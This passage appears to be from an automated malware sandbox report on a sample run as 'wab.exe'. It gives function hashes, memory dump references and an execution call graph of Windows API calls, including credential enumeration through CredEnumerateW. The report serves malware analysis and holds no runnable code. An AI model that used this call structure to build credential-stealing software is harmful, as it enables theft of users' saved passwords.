                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                  • String ID: *?$.
                                                  • API String ID: 2667617558-3972193922
                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                  • Instruction ID: d3c0f10e6b9a741b172044d485653cf9c1b3492cf9878335079b4f5a36f1bc82
                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                  • Instruction Fuzzy Hash: 8B51D371E00209EFCB14DFA8D980AADBBFDEF48354F2481A9D414E7304E6399A01CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: : $Se.
                                                  • API String ID: 4218353326-4089948878
                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                  • Instruction ID: acfacf7b00c05c19436937193b314449062c6fe57ae79cdf468eed6bce8d98df
                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                  • Instruction Fuzzy Hash: FB11E3B1E00348AECB21DFA8D840BDEFBFCEF19244F14409AE545E7212E6745B02CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 23662903
                                                    • Part of subcall function 236635D2: RaiseException.KERNEL32(?,?,?,23662925,00000000,00000000,00000000,?,?,?,?,?,23662925,?,236721B8), ref: 23663632
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 23662920
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID: Unknown exception
                                                  • API String ID: 3476068407-410509341
                                                  • Opcode ID: 67460a501ec7dffc278c74050d155aec48d5847d9865130fb6b13f458af9a22b
                                                  • Instruction ID: bacdcb949c6a8ff677eab7ddd8d9be03eaf800de3893a4faa4599c3730c02d40
                                                  • Opcode Fuzzy Hash: 67460a501ec7dffc278c74050d155aec48d5847d9865130fb6b13f458af9a22b
                                                  • Instruction Fuzzy Hash: A9F0C834A1030CB78B10B6A5EC9499D7B6CAF106D0B9041F5EA25D6495FF39EA19CDCC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetOEMCP.KERNEL32(00000000,?,?,23666C7C,?), ref: 23666A1E
                                                  • GetACP.KERNEL32(00000000,?,?,23666C7C,?), ref: 23666A35
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3267899627.0000000023661000.00000040.00001000.00020000.00000000.sdmp, Offset: 23660000, based on PE: true
                                                  • Associated: 00000007.00000002.3267883757.0000000023660000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3267899627.0000000023676000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_23660000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |lf#
                                                  • API String ID: 0-3500166959
                                                  • Opcode ID: e27087f00671b7db83927d136c44650428f4f7344fa79f60b87fa9e06162a458
                                                  • Instruction ID: dad2a2fcd3ce3151af234fb3146e6f64ddaf11fd493a4f26e74ac2bceab85ebd
                                                  • Opcode Fuzzy Hash: e27087f00671b7db83927d136c44650428f4f7344fa79f60b87fa9e06162a458
                                                  • Instruction Fuzzy Hash: 2DF08C305001088BD704EF68D84876C377CFB103B5FA84384E5288A1C9EBBD8946CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:6.4%
                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:82
                                                  execution_graph 37668 4466f4 37687 446904 37668->37687 37670 446700 GetModuleHandleA 37673 446710 __set_app_type __p__fmode __p__commode 37670->37673 37672 4467a4 37674 4467ac __setusermatherr 37672->37674 37675 4467b8 37672->37675 37673->37672 37674->37675 37688 4468f0 _controlfp 37675->37688 37677 4467bd _initterm __wgetmainargs _initterm 37678 44681e GetStartupInfoW 37677->37678 37679 446810 37677->37679 37681 446866 GetModuleHandleA 37678->37681 37689 41276d 37681->37689 37685 446896 exit 37686 44689d _cexit 37685->37686 37686->37679 37687->37670 37688->37677 37690 41277d 37689->37690 37732 4044a4 LoadLibraryW 37690->37732 37692 412785 37724 412789 37692->37724 37740 414b81 37692->37740 37695 4127c8 37746 412465 memset ??2@YAPAXI 37695->37746 37697 4127ea 37758 40ac21 37697->37758 37702 412813 37776 40dd07 memset 37702->37776 37703 412827 37781 40db69 memset 37703->37781 37706 412822 37802 4125b6 ??3@YAXPAX 37706->37802 37708 40ada2 _wcsicmp 37709 41283d 37708->37709 37709->37706 37712 412863 CoInitialize 37709->37712 37786 41268e 37709->37786 37806 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37712->37806 37714 41296f 37808 40b633 37714->37808 37719 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37723 412957 37719->37723 37729 4128ca 37719->37729 37723->37706 37724->37685 37724->37686 37725 4128d0 TranslateAcceleratorW 37726 412941 GetMessageW 37725->37726 37725->37729 37726->37723 37726->37725 37727 412909 IsDialogMessageW 37727->37726 37727->37729 37728 4128fd IsDialogMessageW 37728->37726 37728->37727 37729->37725 37729->37727 37729->37728 37730 41292b TranslateMessage DispatchMessageW 37729->37730 37731 41291f IsDialogMessageW 37729->37731 37730->37726 37731->37726 37731->37730 37733 4044cf GetProcAddress 37732->37733 37736 4044f7 37732->37736 37734 4044e8 FreeLibrary 37733->37734 37737 4044df 37733->37737 37735 4044f3 37734->37735 37734->37736 37735->37736 37738 404507 MessageBoxW 37736->37738 37739 40451e 37736->37739 37737->37734 37738->37692 37739->37692 37741 414b8a 37740->37741 37742 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37740->37742 37812 40a804 memset 37741->37812 37742->37695 37745 414b9e GetProcAddress 37745->37742 37747 4124e0 37746->37747 37748 412505 ??2@YAPAXI 37747->37748 37749 41251c 37748->37749 37751 412521 37748->37751 37834 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37749->37834 37823 444722 37751->37823 37757 41259b wcscpy 37757->37697 37839 40b1ab ??3@YAXPAX ??3@YAXPAX 37758->37839 37762 40ad4b 37771 40ad76 37762->37771 37863 40a9ce 37762->37863 37763 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37765 40ac5c 37763->37765 37765->37762 37765->37763 37766 40ace7 ??3@YAXPAX 37765->37766 37765->37771 37843 40a8d0 37765->37843 37855 4099f4 37765->37855 37766->37765 37770 40a8d0 7 API calls 37770->37771 37840 40aa04 37771->37840 37772 40ada2 37773 40adc9 37772->37773 37774 40adaa 37772->37774 37773->37702 37773->37703 37774->37773 37775 40adb3 _wcsicmp 37774->37775 37775->37773 37775->37774 37868 40dce0 37776->37868 37778 40dd3a GetModuleHandleW 37873 40dba7 37778->37873 37782 40dce0 3 API calls 37781->37782 37783 40db99 37782->37783 37945 40dae1 37783->37945 37959 402f3a 37786->37959 37788 412766 37788->37706 37788->37712 37789 4126d3 _wcsicmp 37790 4126a8 37789->37790 37790->37788 37790->37789 37792 41270a 37790->37792 37993 4125f8 7 API calls 37790->37993 37792->37788 37962 411ac5 37792->37962 37803 4125da 37802->37803 37804 4125f0 37803->37804 37805 4125e6 DeleteObject 37803->37805 37807 40b1ab ??3@YAXPAX ??3@YAXPAX 37804->37807 37805->37804 37806->37719 37807->37714 37809 40b640 37808->37809 37810 40b639 ??3@YAXPAX 37808->37810 37811 40b1ab ??3@YAXPAX ??3@YAXPAX 37809->37811 37810->37809 37811->37724 37813 40a83b GetSystemDirectoryW 37812->37813 37814 40a84c wcscpy 37812->37814 37813->37814 37819 409719 wcslen 37814->37819 37817 40a881 LoadLibraryW 37818 40a886 37817->37818 37818->37742 37818->37745 37820 409724 37819->37820 37821 409739 wcscat LoadLibraryW 37819->37821 37820->37821 37822 40972c wcscat 37820->37822 37821->37817 37821->37818 37822->37821 37824 444732 37823->37824 37825 444728 DeleteObject 37823->37825 37835 409cc3 37824->37835 37825->37824 37827 412551 37828 4010f9 37827->37828 37829 401130 37828->37829 37830 401134 GetModuleHandleW LoadIconW 37829->37830 37831 401107 wcsncat 37829->37831 37832 40a7be 37830->37832 37831->37829 37833 40a7d2 37832->37833 37833->37757 37833->37833 37834->37751 37838 409bfd memset wcscpy 37835->37838 37837 409cdb CreateFontIndirectW 37837->37827 37838->37837 37839->37765 37841 40aa14 37840->37841 37842 40aa0a ??3@YAXPAX 37840->37842 37841->37772 37842->37841 37844 40a8eb 37843->37844 37845 40a8df wcslen 37843->37845 37846 40a906 ??3@YAXPAX 37844->37846 37847 40a90f 37844->37847 37845->37844 37851 40a919 37846->37851 37848 4099f4 3 API calls 37847->37848 37848->37851 37849 40a932 37853 4099f4 3 API calls 37849->37853 37850 40a929 ??3@YAXPAX 37852 40a93e memcpy 37850->37852 37851->37849 37851->37850 37852->37765 37854 40a93d 37853->37854 37854->37852 37856 409a41 37855->37856 37857 4099fb malloc 37855->37857 37856->37765 37859 409a37 37857->37859 37860 409a1c 37857->37860 37859->37765 37861 409a30 ??3@YAXPAX 37860->37861 37862 409a20 memcpy 37860->37862 37861->37859 37862->37861 37864 40a9e7 37863->37864 37865 40a9dc ??3@YAXPAX 37863->37865 37867 4099f4 3 API calls 37864->37867 37866 40a9f2 37865->37866 37866->37770 37867->37866 37892 409bca GetModuleFileNameW 37868->37892 37870 40dce6 wcsrchr 37871 40dcf5 37870->37871 37872 40dcf9 wcscat 37870->37872 37871->37872 37872->37778 37893 44db70 37873->37893 37877 40dbfd 37896 4447d9 37877->37896 37880 40dc34 wcscpy wcscpy 37922 40d6f5 37880->37922 37881 40dc1f wcscpy 37881->37880 37884 40d6f5 3 API calls 37885 40dc73 37884->37885 37886 40d6f5 3 API calls 37885->37886 37887 40dc89 37886->37887 37888 40d6f5 3 API calls 37887->37888 37889 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37888->37889 37928 40da80 37889->37928 37892->37870 37894 40dbb4 memset memset 37893->37894 37895 409bca GetModuleFileNameW 37894->37895 37895->37877 37898 4447f4 37896->37898 37897 40dc1b 37897->37880 37897->37881 37898->37897 37899 444807 ??2@YAPAXI 37898->37899 37900 44481f 37899->37900 37901 444873 _snwprintf 37900->37901 37902 4448ab wcscpy 37900->37902 37935 44474a 8 API calls 37901->37935 37904 4448bb 37902->37904 37936 44474a 8 API calls 37904->37936 37906 4448a7 37906->37902 37906->37904 37907 4448cd 37937 44474a 8 API calls 37907->37937 37909 4448e2 37938 44474a 8 API calls 37909->37938 37911 4448f7 37939 44474a 8 API calls 37911->37939 37913 44490c 37940 44474a 8 API calls 37913->37940 37915 444921 37941 44474a 8 API calls 37915->37941 37917 444936 37942 44474a 8 API calls 37917->37942 37919 44494b 37943 44474a 8 API calls 37919->37943 37921 444960 ??3@YAXPAX 37921->37897 37923 44db70 37922->37923 37924 40d702 memset GetPrivateProfileStringW 37923->37924 37925 40d752 37924->37925 37926 40d75c WritePrivateProfileStringW 37924->37926 37925->37926 37927 40d758 37925->37927 37926->37927 37927->37884 37929 44db70 37928->37929 37930 40da8d memset 37929->37930 37931 40daac LoadStringW 37930->37931 37932 40dac6 37931->37932 37932->37931 37934 40dade 37932->37934 37944 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37932->37944 37934->37706 37935->37906 37936->37907 37937->37909 37938->37911 37939->37913 37940->37915 37941->37917 37942->37919 37943->37921 37944->37932 37955 409b98 GetFileAttributesW 37945->37955 37947 40daea 37948 40db63 37947->37948 37949 40daef wcscpy wcscpy GetPrivateProfileIntW 37947->37949 37948->37708 37956 40d65d GetPrivateProfileStringW 37949->37956 37951 40db3e 37957 40d65d GetPrivateProfileStringW 37951->37957 37953 40db4f 37958 40d65d GetPrivateProfileStringW 37953->37958 37955->37947 37956->37951 37957->37953 37958->37948 37994 40eaff 37959->37994 37963 411ae2 memset 37962->37963 37964 411b8f 37962->37964 38034 409bca GetModuleFileNameW 37963->38034 37976 411a8b 37964->37976 37966 411b0a wcsrchr 37967 411b22 wcscat 37966->37967 37968 411b1f 37966->37968 38035 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37967->38035 37968->37967 37970 411b67 38036 402afb 37970->38036 37974 411b7f 38092 40ea13 SendMessageW memset SendMessageW 37974->38092 37977 402afb 27 API calls 37976->37977 37978 411ac0 37977->37978 37979 4110dc 37978->37979 37980 41113e 37979->37980 37985 4110f0 37979->37985 38117 40969c LoadCursorW SetCursor 37980->38117 37982 411143 38118 4032b4 37982->38118 38136 444a54 37982->38136 37983 4110f7 _wcsicmp 37983->37985 37984 411157 37986 40ada2 _wcsicmp 37984->37986 37985->37980 37985->37983 38139 410c46 10 API calls 37985->38139 37989 411167 37986->37989 37987 4111af 37989->37987 37990 4111a6 qsort 37989->37990 37990->37987 37993->37790 37995 40eb10 37994->37995 38007 40e8e0 37995->38007 37998 40eb6c memcpy memcpy 37999 40ebb7 37998->37999 37999->37998 38000 40ebf2 ??2@YAPAXI ??2@YAPAXI 37999->38000 38001 40d134 16 API calls 37999->38001 38002 40ec2e ??2@YAPAXI 38000->38002 38004 40ec65 38000->38004 38001->37999 38002->38004 38004->38004 38017 40ea7f 38004->38017 38006 402f49 38006->37790 38008 40e8f2 38007->38008 38009 40e8eb ??3@YAXPAX 38007->38009 38010 40e900 38008->38010 38011 40e8f9 ??3@YAXPAX 38008->38011 38009->38008 38012 40e911 38010->38012 38013 40e90a ??3@YAXPAX 38010->38013 38011->38010 38014 40e931 ??2@YAPAXI ??2@YAPAXI 38012->38014 38015 40e921 ??3@YAXPAX 38012->38015 38016 40e92a ??3@YAXPAX 38012->38016 38013->38012 38014->37998 38015->38016 38016->38014 38018 40aa04 ??3@YAXPAX 38017->38018 38019 40ea88 38018->38019 38020 40aa04 ??3@YAXPAX 38019->38020 38021 40ea90 38020->38021 38022 40aa04 ??3@YAXPAX 38021->38022 38023 40ea98 38022->38023 38024 40aa04 ??3@YAXPAX 38023->38024 38025 40eaa0 38024->38025 38026 40a9ce 4 API calls 38025->38026 38027 40eab3 38026->38027 38028 40a9ce 4 API calls 38027->38028 38029 40eabd 38028->38029 38030 40a9ce 4 API calls 38029->38030 38031 40eac7 38030->38031 38032 40a9ce 4 API calls 38031->38032 38033 40ead1 38032->38033 38033->38006 38034->37966 38035->37970 38093 40b2cc 38036->38093 38038 402b0a 38039 40b2cc 27 API calls 38038->38039 38040 402b23 38039->38040 38041 40b2cc 27 API calls 38040->38041 38042 402b3a 38041->38042 38043 40b2cc 27 API calls 38042->38043 38044 402b54 38043->38044 38045 40b2cc 27 API calls 38044->38045 38046 402b6b 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402b82 38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402b99 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402bb0 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402bc7 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402bde 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402bf5 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402c0c 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402c23 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402c3a 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402c51 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402c68 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402c7f 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402c99 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402cb3 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402cd5 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402cf0 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402d0b 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402d26 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402d3e 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402d59 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402d78 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402d93 38089->38090 38091 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38090->38091 38091->37974 38092->37964 38096 40b58d 38093->38096 38095 40b2d1 38095->38038 38097 40b5a4 GetModuleHandleW FindResourceW 38096->38097 38098 40b62e 38096->38098 38099 40b5c2 LoadResource 38097->38099 38100 40b5e7 38097->38100 38098->38095 38099->38100 38101 40b5d0 SizeofResource LockResource 38099->38101 38100->38098 38109 40afcf 38100->38109 38101->38100 38103 40b608 memcpy 38112 40b4d3 memcpy 38103->38112 38105 40b61e 38113 40b3c1 18 API calls 38105->38113 38107 40b626 38114 40b04b 38107->38114 38110 40b04b ??3@YAXPAX 38109->38110 38111 40afd7 ??2@YAPAXI 38110->38111 38111->38103 38112->38105 38113->38107 38115 40b051 ??3@YAXPAX 38114->38115 38116 40b05f 38114->38116 38115->38116 38116->38098 38117->37982 38119 4032c4 38118->38119 38120 40b633 ??3@YAXPAX 38119->38120 38121 403316 38120->38121 38140 44553b 38121->38140 38125 403480 38336 40368c 15 API calls 38125->38336 38127 403489 38128 40b633 ??3@YAXPAX 38127->38128 38129 403495 38128->38129 38129->37984 38130 4033a9 memset memcpy 38131 4033ec wcscmp 38130->38131 38132 40333c 38130->38132 38131->38132 38132->38125 38132->38130 38132->38131 38334 4028e7 11 API calls 38132->38334 38335 40f508 6 API calls 38132->38335 38134 403421 _wcsicmp 38134->38132 38137 444a64 FreeLibrary 38136->38137 38138 444a83 38136->38138 38137->38138 38138->37984 38139->37985 38141 445548 38140->38141 38142 445599 38141->38142 38337 40c768 38141->38337 38143 4455a8 memset 38142->38143 38149 4457f2 38142->38149 38420 403988 38143->38420 38152 445854 38149->38152 38522 403e2d memset memset memset memset memset 38149->38522 38203 4458aa 38152->38203 38545 403c9c memset memset memset memset memset 38152->38545 38153 445672 38431 403fbe memset memset memset memset memset 38153->38431 38154 4458bb memset memset 38156 414c2e 16 API calls 38154->38156 38155 4455e5 38155->38153 38165 44560f 38155->38165 38159 4458f9 38156->38159 38158 44595e memset memset 38163 414c2e 16 API calls 38158->38163 38164 40b2cc 27 API calls 38159->38164 38161 445a00 memset memset 38568 414c2e 38161->38568 38162 445b22 38168 445bca 38162->38168 38169 445b38 memset memset memset 38162->38169 38173 44599c 38163->38173 38174 445909 38164->38174 38176 4087b3 338 API calls 38165->38176 38166 44557a 38200 44558c 38166->38200 38617 41366b FreeLibrary 38166->38617 38167 445849 38632 40b1ab ??3@YAXPAX ??3@YAXPAX 38167->38632 38175 445c8b memset memset 38168->38175 38242 445cf0 38168->38242 38178 445bd4 38169->38178 38179 445b98 38169->38179 38182 40b2cc 27 API calls 38173->38182 38184 409d1f 6 API calls 38174->38184 38187 414c2e 16 API calls 38175->38187 38185 445621 38176->38185 38177 44589f 38633 40b1ab ??3@YAXPAX ??3@YAXPAX 38177->38633 38193 414c2e 16 API calls 38178->38193 38179->38178 38189 445ba2 38179->38189 38186 4459ac 38182->38186 38183 403335 38333 4452e5 45 API calls 38183->38333 38196 445919 38184->38196 38618 4454bf 20 API calls 38185->38618 38198 409d1f 6 API calls 38186->38198 38199 445cc9 38187->38199 38705 4099c6 wcslen 38189->38705 38190 4456b2 38620 40b1ab ??3@YAXPAX ??3@YAXPAX 38190->38620 38192 40b2cc 27 API calls 38204 445a4f 38192->38204 38206 445be2 38193->38206 38194 445d3d 38227 40b2cc 27 API calls 38194->38227 38195 445d88 memset memset memset 38210 414c2e 16 API calls 38195->38210 38634 409b98 GetFileAttributesW 38196->38634 38197 445823 38197->38167 38209 4087b3 338 API calls 38197->38209 38211 4459bc 38198->38211 38212 409d1f 6 API calls 38199->38212 38404 444b06 38200->38404 38201 445879 38201->38177 38222 4087b3 338 API calls 38201->38222 38203->38154 38228 44594a 38203->38228 38583 409d1f wcslen wcslen 38204->38583 38207 40b2cc 27 API calls 38206->38207 38216 445bf3 38207->38216 38209->38197 38219 445dde 38210->38219 38701 409b98 GetFileAttributesW 38211->38701 38221 445ce1 38212->38221 38213 445bb3 38708 445403 memset 38213->38708 38214 445680 38214->38190 38454 4087b3 memset 38214->38454 38226 409d1f 6 API calls 38216->38226 38217 445928 38217->38228 38635 40b6ef 38217->38635 38229 40b2cc 27 API calls 38219->38229 38725 409b98 GetFileAttributesW 38221->38725 38222->38201 38225 40b2cc 27 API calls 38234 445a94 38225->38234 38236 445c07 38226->38236 38237 445d54 _wcsicmp 38227->38237 38228->38158 38241 4459ed 38228->38241 38240 445def 38229->38240 38230 4459cb 38230->38241 38250 40b6ef 252 API calls 38230->38250 38588 40ae18 38234->38588 38235 44566d 38235->38149 38505 413d4c 38235->38505 38246 445389 258 API calls 38236->38246 38247 445d71 38237->38247 38312 445d67 38237->38312 38239 445665 38619 40b1ab ??3@YAXPAX ??3@YAXPAX 38239->38619 38248 409d1f 6 API calls 38240->38248 38241->38161 38241->38162 38242->38183 38242->38194 38242->38195 38243 445389 258 API calls 38243->38168 38252 445c17 38246->38252 38726 445093 23 API calls 38247->38726 38255 445e03 38248->38255 38250->38241 38251 4456d8 38257 40b2cc 27 API calls 38251->38257 38258 40b2cc 27 API calls 38252->38258 38254 44563c 38254->38239 38260 4087b3 338 API calls 38254->38260 38727 409b98 GetFileAttributesW 38255->38727 38256 40b6ef 252 API calls 38256->38183 38262 4456e2 38257->38262 38263 445c23 38258->38263 38259 445d83 38259->38183 38260->38254 38621 413fa6 _wcsicmp _wcsicmp 38262->38621 38267 409d1f 6 API calls 38263->38267 38265 445e12 38272 445e6b 38265->38272 38278 40b2cc 27 API calls 38265->38278 38270 445c37 38267->38270 38268 445aa1 38271 445b17 38268->38271 38286 445ab2 memset 38268->38286 38299 409d1f 6 API calls 38268->38299 38595 40add4 38268->38595 38600 445389 38268->38600 38609 40ae51 38268->38609 38269 4456eb 38274 4456fd memset memset memset memset 38269->38274 38275 4457ea 38269->38275 38276 445389 258 API calls 38270->38276 38702 40aebe 38271->38702 38729 445093 23 API calls 38272->38729 38622 409c70 wcscpy wcsrchr 38274->38622 38625 413d29 38275->38625 38282 445c47 38276->38282 38283 445e33 38278->38283 38280 445e7e 38285 445f67 38280->38285 38288 40b2cc 27 API calls 38282->38288 38289 409d1f 6 API calls 38283->38289 38294 40b2cc 27 API calls 38285->38294 38290 40b2cc 27 API calls 38286->38290 38292 445c53 38288->38292 38293 445e47 38289->38293 38290->38268 38291 409c70 2 API calls 38295 44577e 38291->38295 38296 409d1f 6 API calls 38292->38296 38728 409b98 GetFileAttributesW 38293->38728 38298 445f73 38294->38298 38300 409c70 2 API calls 38295->38300 38301 445c67 38296->38301 38303 409d1f 6 API calls 38298->38303 38299->38268 38304 44578d 38300->38304 38305 445389 258 API calls 38301->38305 38302 445e56 38302->38272 38308 445e83 memset 38302->38308 38306 445f87 38303->38306 38304->38275 38311 40b2cc 27 API calls 38304->38311 38305->38168 38732 409b98 GetFileAttributesW 38306->38732 38310 40b2cc 27 API calls 38308->38310 38313 445eab 38310->38313 38314 4457a8 38311->38314 38312->38183 38312->38256 38315 409d1f 6 API calls 38313->38315 38316 409d1f 6 API calls 38314->38316 38317 445ebf 38315->38317 38318 4457b8 38316->38318 38319 40ae18 9 API calls 38317->38319 38624 409b98 GetFileAttributesW 38318->38624 38329 445ef5 38319->38329 38321 4457c7 38321->38275 38323 4087b3 338 API calls 38321->38323 38322 40ae51 9 API calls 38322->38329 38323->38275 38324 445f5c 38326 40aebe FindClose 38324->38326 38325 40add4 2 API calls 38325->38329 38326->38285 38327 40b2cc 27 API calls 38327->38329 38328 409d1f 6 API calls 38328->38329 38329->38322 38329->38324 38329->38325 38329->38327 38329->38328 38331 445f3a 38329->38331 38730 409b98 GetFileAttributesW 38329->38730 38731 445093 23 API calls 38331->38731 38333->38132 38334->38134 38335->38132 38336->38127 38338 40c775 38337->38338 38733 40b1ab ??3@YAXPAX ??3@YAXPAX 38338->38733 38340 40c788 38734 40b1ab ??3@YAXPAX ??3@YAXPAX 38340->38734 38342 40c790 38735 40b1ab ??3@YAXPAX ??3@YAXPAX 38342->38735 38344 40c798 38345 40aa04 ??3@YAXPAX 38344->38345 38346 40c7a0 38345->38346 38736 40c274 memset 38346->38736 38351 40a8ab 9 API calls 38352 40c7c3 38351->38352 38353 40a8ab 9 API calls 38352->38353 38354 40c7d0 38353->38354 38765 40c3c3 38354->38765 38358 40c7e5 38359 40c877 38358->38359 38360 40c86c 38358->38360 38366 40c634 49 API calls 38358->38366 38790 40a706 38358->38790 38367 40bdb0 38359->38367 38807 4053fe 39 API calls 38360->38807 38366->38358 38975 404363 38367->38975 38370 40bf5d 38995 40440c 38370->38995 38372 40bdee 38372->38370 38375 40b2cc 27 API calls 38372->38375 38373 40bddf CredEnumerateW 38373->38372 38376 40be02 wcslen 38375->38376 38376->38370 38378 40be1e 38376->38378 38377 40be26 _wcsncoll 38377->38378 38378->38370 38378->38377 38381 40be7d memset 38378->38381 38382 40bea7 memcpy 38378->38382 38383 40bf11 wcschr 38378->38383 38384 40b2cc 27 API calls 38378->38384 38386 40bf43 LocalFree 38378->38386 38998 40bd5d 28 API calls 38378->38998 38999 404423 38378->38999 38381->38378 38381->38382 38382->38378 38382->38383 38383->38378 38385 40bef6 _wcsnicmp 38384->38385 38385->38378 38385->38383 38386->38378 38387 4135f7 39012 4135e0 38387->39012 38390 40b2cc 27 API calls 38391 41360d 38390->38391 38392 40a804 8 API calls 38391->38392 38393 413613 38392->38393 38394 41361b 38393->38394 38395 41363e 38393->38395 38396 40b273 27 API calls 38394->38396 38397 4135e0 FreeLibrary 38395->38397 38398 413625 GetProcAddress 38396->38398 38399 413643 38397->38399 38398->38395 38400 413648 38398->38400 38399->38166 38401 413658 38400->38401 38402 4135e0 FreeLibrary 38400->38402 38401->38166 38403 413666 38402->38403 38403->38166 39015 4449b9 38404->39015 38407 444c1f 38407->38142 38408 4449b9 42 API calls 38410 444b4b 38408->38410 38409 444c15 38412 4449b9 42 API calls 38409->38412 38410->38409 39036 444972 GetVersionExW 38410->39036 38412->38407 38413 444b99 memcmp 38418 444b8c 38413->38418 38414 444c0b 39040 444a85 42 API calls 38414->39040 38418->38413 38418->38414 39037 444aa5 42 API calls 38418->39037 39038 40a7a0 GetVersionExW 38418->39038 39039 444a85 42 API calls 38418->39039 38421 40399d 38420->38421 39041 403a16 38421->39041 38423 403a09 39055 40b1ab ??3@YAXPAX ??3@YAXPAX 38423->39055 38425 403a12 wcsrchr 38425->38155 38426 4039a3 38426->38423 38429 4039f4 38426->38429 39052 40a02c CreateFileW 38426->39052 38429->38423 38430 4099c6 2 API calls 38429->38430 38430->38423 38432 414c2e 16 API calls 38431->38432 38433 404048 38432->38433 38434 414c2e 16 API calls 38433->38434 38435 404056 38434->38435 38436 409d1f 6 API calls 38435->38436 38437 404073 38436->38437 38438 409d1f 6 API calls 38437->38438 38439 40408e 38438->38439 38440 409d1f 6 API calls 38439->38440 38441 4040a6 38440->38441 38442 403af5 20 API calls 38441->38442 38443 4040ba 38442->38443 38444 403af5 20 API calls 38443->38444 38445 4040cb 38444->38445 39082 40414f memset 38445->39082 38447 404140 39096 40b1ab ??3@YAXPAX ??3@YAXPAX 38447->39096 38449 4040ec memset 38452 4040e0 38449->38452 38450 404148 38450->38214 38451 4099c6 2 API calls 38451->38452 38452->38447 38452->38449 38452->38451 38453 40a8ab 9 API calls 38452->38453 38453->38452 39109 40a6e6 WideCharToMultiByte 38454->39109 38456 4087ed 39110 4095d9 memset 38456->39110 38459 408953 38459->38214 38460 408809 memset memset memset memset memset 38461 40b2cc 27 API calls 38460->38461 38462 4088a1 38461->38462 38463 409d1f 6 API calls 38462->38463 38464 4088b1 38463->38464 38465 40b2cc 27 API calls 38464->38465 38466 4088c0 38465->38466 38467 409d1f 6 API calls 38466->38467 38468 4088d0 38467->38468 38469 40b2cc 27 API calls 38468->38469 38470 4088df 38469->38470 38471 409d1f 6 API calls 38470->38471 38472 4088ef 